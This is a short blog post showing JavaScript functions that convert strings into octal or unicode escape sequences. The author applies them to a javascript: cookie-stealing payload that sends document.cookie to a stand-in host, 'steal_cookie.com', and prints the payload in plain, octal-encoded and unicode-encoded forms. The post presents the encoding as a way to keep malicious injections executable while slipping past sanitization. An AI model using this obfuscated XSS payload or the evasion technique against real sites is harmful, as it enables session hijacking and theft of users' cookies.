But Totally Unreadable

Posted at


function string_to_octal(string){
return string.replace(/./g, function(char, index, whole){
return 256 > char.charCodeAt(0) ? "\\\\" + ('0' + char.charCodeAt(0).toString(8)).slice(-3) : unicode_to_string(char);
});
}
function string_to_unicode(string){
return string.replace(/./g, function(char, index, whole){
return "\\\\u" + ('0000' + char.charCodeAt(0).toString(16)).slice(-4);
});
}
function unicode_to_string(string){
return string.replace(/[\\u0000-\\uffff]/g, function(char, index, whole){
return String.fromCharCode(char.charCodeAt(0).toString(10));
});
}


test it..
for javascript:(function(){var img = new Image(); img.src="https://steal_cookie.com?cookie=" + encodeURIComponent(document.cookie); return true;}());

either the "prefer octal over unicode": "\\152\\141\\166\\141\\163\\143\\162\\151\\160\\164\\072\\050\\146\\165\\156\\143\\164\\151\\157\\156\\050\\051\\173\\166\\141\\162\\040\\151\\155\\147\\040\\075\\040\\156\\145\\167\\040\\111\\155\\141\\147\\145\\050\\051\\073\\040\\151\\155\\147\\056\\163\\162\\143\\075\\042\\150\\164\\164\\160\\163\\072\\057\\057\\163\\164\\145\\141\\154\\137\\143\\157\\157\\153\\151\\145\\056\\143\\157\\155\\077\\143\\157\\157\\153\\151\\145\\075\\042\\040\\053\\040\\145\\156\\143\\157\\144\\145\\125\\122\\111\\103\\157\\155\\160\\157\\156\\145\\156\\164\\050\\144\\157\\143\\165\\155\\145\\156\\164\\056\\143\\157\\157\\153\\151\\145\\051\\073\\040\\162\\145\\164\\165\\162\\156\\040\\164\\162\\165\\145\\073\\175\\050\\051\\051\\073" (which most of ASCII based code will work quite unify with..)
or just "100% unicode encoding": "\\u006a\\u0061\\u0076\\u0061\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003a\\u0028\\u0066\\u0075\\u006e\\u0063\\u0074\\u0069\\u006f\\u006e\\u0028\\u0029\\u007b\\u0076\\u0061\\u0072\\u0020\\u0069\\u006d\\u0067\\u0020\\u003d\\u0020\\u006e\\u0065\\u0077\\u0020\\u0049\\u006d\\u0061\\u0067\\u0065\\u0028\\u0029\\u003b\\u0020\\u0069\\u006d\\u0067\\u002e\\u0073\\u0072\\u0063\\u003d\\u0022\\u0068\\u0074\\u0074\\u0070\\u0073\\u003a\\u002f\\u002f\\u0073\\u0074\\u0065\\u0061\\u006c\\u005f\\u0063\\u006f\\u006f\\u006b\\u0069\\u0065\\u002e\\u0063\\u006f\\u006d\\u003f\\u0063\\u006f\\u006f\\u006b\\u0069\\u0065\\u003d\\u0022\\u0020\\u002b\\u0020\\u0065\\u006e\\u0063\\u006f\\u0064\\u0065\\u0055\\u0052\\u0049\\u0043\\u006f\\u006d\\u0070\\u006f\\u006e\\u0065\\u006e\\u0074\\u0028\\u0064\\u006f\\u0063\\u0075\\u006d\\u0065\\u006e\\u0074\\u002e\\u0063\\u006f\\u006f\\u006b\\u0069\\u0065\\u0029\\u003b\\u0020\\u0072\\u0065\\u0074\\u0075\\u0072\\u006e\\u0020\\u0074\\u0072\\u0075\\u0065\\u003b\\u007d\\u0028\\u0029\\u0029\\u003b"

running the following will have same meaning, and it will not actual needed to be translated back, it is totally 100% executable code, but (naturally) a bit more hard to read..
but it DOES sanitize successfully since the character encoding does not differentiate any of the char meaning (other then escaped string - string manipulation).


the idea is that you do not need any conversion-matrix tables, or encrypt/decrypt methods (or any intermediate over just evaluating the string).

', 'JavaScript Character Encoding As Spoofing, Or Malicious Injections That Are 100% executable